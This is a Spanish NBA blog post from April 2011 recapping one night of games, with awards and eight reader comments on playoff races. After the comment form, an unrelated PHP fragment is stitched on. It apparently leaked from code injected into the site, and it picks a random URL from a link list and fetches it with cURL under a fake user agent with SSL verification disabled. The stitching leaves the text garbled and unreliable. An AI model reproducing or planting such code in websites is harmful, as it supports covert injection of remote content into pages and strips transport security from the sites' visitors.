La Crónica (05/04/2011)

06 de April de 2011 por TheDeerHunter

Parece claro que el gran triunfador de la regular saldrá de la dupla Spurs-Bulls. Los tejanos mantienen el mando gracias a su meritoria victoria en Atlanta y, de paso, recuperan sensaciones (97-90). Los Hawks no contaban con Josh Smith y lo notaron. Con Parker destacado, el viejo Big Three de San Antonio se impuso al formado por Horford-Joe Johnson-Crawford.

Los Bulls, por su parte, tampoco lo tuvieron fácil como anfitriones de los Suns (94-97). El enfrentamiento entre dos modelos antagónicos de bases nos permitió comprobar que a Derrick Rose aún le quedan 4 cosas por aprender de Steve Nash. El canadiense creaba al mismo ritmo que el base de los Bulls ejecutaba. Sin querer menospreciarle lo más mínimo, no le iría mal una parte de la visión de juego del primero. Vince ha encontrado su sitio fuera del quinteto y Gortat, por fin, lo ha encontrado dentro. Con tales mimbres estuvieron a punto de levantar una desventaja de hasta 22 puntos. Muy mal resuelta la hipotética remontada en la última jugada, eso sí.

Los Lakers salieron de esta lucha dándose una batacazo tremendo en casa contra Utah (86-85). Gordon Hayward les hizo un roto considerable y ellos no estuvieron muy finos. Aunque se despejaron ciertas reservas con Pau y Bynum, volvimos a ver a un Kobe excesivamente ansioso y fallón. Le vimos estropear otra última jugada de una manera impropia a un genio como el suyo. Harán bien en concentrarse en el retrovisor, pues quedan a un paso de perder la ventaja hipotética contra Miami y Boston. Los verdes, en esta ocasión, no tuvieron grandes problemas para derrotar a los Sixers (82-99). Rondo fue el líder que todos esperamos que sea.

Con la derrota de Atlanta y su sufrida victoria ante Milwaukee, Orlando se asegura la ventaja campo en primera ronda. Howard se comió al otrora considerado por alguno como el mejor pívot de la liga. El partido resultó feo. Ningún titular Buck alcanzó los 10 puntos y la defensa no pudo revertir tal déficit (72-78).

Los Grizzlies sufrieron un mal tropiezo ante los Clippers (82-81). En esta ocasión no hubo producción más allá de los titulares y los Clippers se llevaron el gato al agua por un punto. Sin embargo la derrota resultó menos grave con el palizón que se llevaron los Blazers de manos de los Warriors y los tres demonios que parecían Lee, Monta y Curry (108-87). Mejor aún para ellos fue la derrota de Houston en casa ante Sacramento (104-101). ¡Qué tarde han despertado los Kings!

Dos duelos más de zona de playoffs, con menor trascendencia ambos. Los Knicks le endosaron 131 a los Raptors con una actuación excepcional de Douglas (118-131). Los Thunder, por su parte, resolvieron sobrados el simulacro de primera ronda que tuvieron contra Denver (101-94). Durant, como casi siempre, marcó la diferencia.

Para terminar Cleveland ganó a Charlotte (89-99), New Jersey a Minnesotta con Deron repartiendo por todas partes (105-107) y los Wizards a Detroit (105-107). Stuckey no jugó por decisión técnica.

PREMIOS

MVP: Cada equipo tiene su particular Big Three. Anoche el de los Warriors funcionó como un reloj para derrotar a los Blazers. David Lee (26 puntos y 20 rebotes), Monta Ellis (30 puntos, 3 rebotes y 5 asistencias) y Stephen Curry (28 puntos, 8 rebotes y 4 asistencias)  se quedaron a un paso de igualar al de los Heat.

Rookie: Día de rookies. John Wall se convirtió en amo y señor del encuentro frente los Pistons al anotar 26 puntos, repartir 12 asistencias, capturar 6 rebotesy robar 4 balones. Su último cuarto fue fantástico. Y en Los Angeles, Gordon Hayward puso el Staples Center patas arriba con 22 puntos, 6 rebotes, 5 asistencias y el tiro libre decisivo para llevarse el partido. Y todo, siendo pareja de baile de Kobe Bryant nada menos. Greg Monroe (22 puntos, 14 rebotes, 4 asistencias y 4 robos), Ed Davis (22-13), Demarcus Cousins (15-15), Blake Griffin (15-14) y Derrick Favors (14-11) también tuvieron cuajaron actuaciones destacadas.

Sorpresa: Saliendo desde el banco, Toney Douglas aportó 28 puntos, 5 asistencias y 2 robos. ¿Le va mejor a los Knicks jugar con él de base o con Chauncey Billups?

Decepción: En 30 minutos de juego, Anthony Parker falló los 8 lanzamientos a canasta que intentó y aún así, los Cavs ganaron. Curioso.

Esfuerzo en vano: Anotar 36 puntos, pillar 10 rebotes y perder de paliza debe ser frustrante. Anoche le pasó a Demar DeRozan.

Imágenes | AP Photos / Getty Images

Comenta

8 comentarios a esta entrada

  1. CAMPO2 dice:
    #1

    Como no nombrais en la sorpresa el 30-12 de Brook Lopez? por lo que parece ayer no se le olvidaron las manos en el vestuario antes de salir a jugar y capturo una buena suma de rebotes

      Citar

  2. Javijaen dice:
    #2

    Buenos dias locos de la NBA. Soy un aficionado de los Knicks algo ya viejo (29 tacos), pero me gustaria comentar sobre mi equipo, aunque desgraciadamente no puedo verlos por la noche lo que me gustaría. La próxima jornada sobre todo hay un 76ers-Knicks relativamente apasionante por la sexta plaza, y me gustaría que me dierais vuestra opinión sobre el “Big Three” de los neoyorquinos. ¿No creeis que actualmente Amaré es el lider real del equipo, incluso por encima de Melo? ¿Y qué jugadores necesitarían los Knicks para hacerle frente a Celtics o Heat en el poste bajo (p.e. Marc Gasol)? Al menos para no perder 4-0 en PO… Por cierto, este Rose se va a salir… Muchas gracias cracks!!

      Citar

  3. Sancho88 dice:
    #3

    jajaj. pobre brook, la leña que le damos al hombre y los paquetes de verdad son el resto, yo creo. el chico solo tiene alergia a los rebotes, nada mas. en la nba hay muxos asi. bargnani es tb grandote y coge menos rebotes que él, y no le damos ni la mitad de estopa.

    A los Kings lo único que los mueve es intentar sobrepasar las 25 victorias del año pasado. Hace dos hicieron 17, el año pasado 25, ahora van por 23 y les quedan 5 partidos. supongo que en las estadisticas y en el proyecto a medio plazo esto lo tendran muy en cuenta, para que les cuadre la progresion o algo por el estilo. yo pienso que se quedaran en 24-25, porque hasta el domingo tienen que visitar a los Spurs, a Memphis y a los Warriors, y los ultimos dos partidos les visitan los Thunder y los Lakers. Por tanto… partidos muy complicados. Los Spurs jugandose el primer puesto con Chicago, Memhpis necesita asegurar una victoria más, Warriors en casa te matan a triples (aunque es el partido que mas posibilidades tienen), y despues Thunder (tampoco se juegan nada, a priori, y fuera de casa fallan con asiduidad, puede ser victoria King) y Lakers, que se estan jugando ventaja de campo en las finales contra miami y boston… ni de coña rascan ahí.

    no se, es un equipo rapido y que anota con facilidad, pero tampoco juegan a algo muy definido, con jugadas coherentes ni nada. eso si, despacico con ellos que tiran de talento y te meten las tripas en un canasto, jeje. yo, peronsalmente, le renovaria a ese señor llamado Dalembert. No al precio que cobra ahora mismo, 12 kilos, pero 6 o 7 sí que le daría. Ojalá no prescindan de el, porque si todo progresa como parece, le van a necesitar en proximas temporadas. que pensais de este jugador?

      Citar

  4. Rompe dice:
    #4

    Entre los rookies destacar también a Evan Turner, al que se le han dado tantos palos a lo largo de la temporada y anoche jugó un partidazo…

      Citar

  5. GreenPride dice:
    #5

    Bueno pues interesantísimo tramo final de temporada regular antes del plato fuerte de los playoffs en los partidos que quedan. Practicamente todos los equipos se van a jugar algo en los últimos partidos a saber.
    Bulls y Spurs el primer puesto de la liga
    Los Lakers que parecía optaban a coger a los Spurs ahora con dos derrotas consecutivas en casa pasan a tener que asegurar la ventaja campo contra los rivales del Este Boston y Miami y no descuidarse para que no les coja Dallas.
    Miami y Boston se juegan a ver quien tiene ventaja campo en una hipotética segunda ronda de playoffs entre ellos y el pasar a los Lakers para unas posibles finales con ventaja campo.
    Philadelphia y New York se juegan quien será 6º y quien 7º en el Este y de ahi y lo anterior los emparejamientos en primera ronda.
    Portland, New Orleans y Memphis se jugarán los puestos 6, 7 y 8 en el Oeste y por tanto las primeras eliminatorias.
    Esto nos dejará grandes partidos en estas ultimas jornadas como Bulls-Celtics, Heat-Celtics, Lakers-Thunder, Lakers-Spurs entre otros.
    De ayer los Celtics dieron buena imagen ante unos peligrosos Sixers que venían jugando bien. La presencia de Jermaine aunque no sean muchos minutos da mucha más solidez interior y él y Shaq son imprescindibles para los verdes en playoffs. Bien Pierce, Rondo, Garnett y el banquillo no estuvo mal. Veremos que pasa de aquí al final de la regular.
    También vi el Thunder-Nuggets

      Citar

  6. Txusma dice:
    #6

    Ayer Utah jugó con Millsap, Favors y Jefferson buena parte del encuentro. Supongo que Millsap sería el 3, algo por lo que nadie hubiese apostado cuando llegó a la NBA hace un tiempo. Lo defendió Artest?
    Y gran partido de Hayward. Si Kirilenko abandona los Jazz, ya tienen sustituto.

      Citar

  7. GreenPride dice:
    #7

    Como iba diciendo en Denver, los Thunder ganaron muy bien a un equipo muy en forma. Oklahoma ha ganado en fortaleza interior al dar más minutos a Ibaka de 4 por Green y tener a Perkins y a Mohammed en el puesto de 5. Eso y su calidad exterior en Westbrook, Durant y Harden les hacen ser un rival a tener en cuenta para los playoffs para cualquiera. Enfrente, Denver es un equipo donde 7 jugadores pueden anotar con facilidad, sin estrellas y muy aguerrido. Será un enfrentamiento duro contra los Thunder en primera ronda pero creo que la calidad de Durant y Westbrook acabará imponiéndose.

      Citar

  8. Txusma dice:
    #8

    #javijaen 29 años y dice algo viejo! La madre que te… :D:D

    Introducir en el equipo a un AllStar como Melo no es fácil y menos si para traértelo has tenido que dar el oro y el moro y desmontar completamente tu equipo. Este año no harán nada en Playoffs así que en la Gran Manzana ya deberían estar pensando en la temporada que viene. Cómo van a rodear a Melo y Stou? Se quedará Billups?
    Personalmente, Carmelo es un jugador q nunca me ha acabado de enganchar…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>